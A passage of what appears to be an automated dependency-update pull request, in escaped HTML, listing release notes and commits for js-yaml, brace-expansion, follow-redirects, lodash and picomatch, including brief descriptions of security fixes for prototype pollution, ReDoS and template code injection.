released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 2.0.1 to 2.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 4.0.2 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.4\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.0.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains \u003ccode\u003econstructor\u003c/code\u003e by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e5474fc1a4d7991870058170407dda8a42be5334\"\u003e\u003ccode\u003ee5474fc\u003c/code\u003e\u003c/a\u003e Publish 4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\"\u003e\u003ccode\u003e4516eb5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\"\u003e\u003ccode\u003e5eceecd\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/0db7dd70651ca7c8265601c0442a996ed32e3238\"\u003e\u003ccode\u003e0db7dd7\u003c/code\u003e\u003c/a\u003e Run benchmark again against latest minimatch version (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/161\"\u003e#161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/95003777eb1c60dec09495a8231fa2ba4054d76a\"\u003e\u003ccode\u003e9500377\u003c/code\u003e\u003c/a\u003e docs: clarify what brace expansion syntax is and isn't supported (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/2661f23eca86c8b4a2b14815b9b2b3b74bd5a171\"\u003e\u003ccode\u003e2661f23\u003c/code\u003e\u003c/a\u003e fix typo in globstars.js test name (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 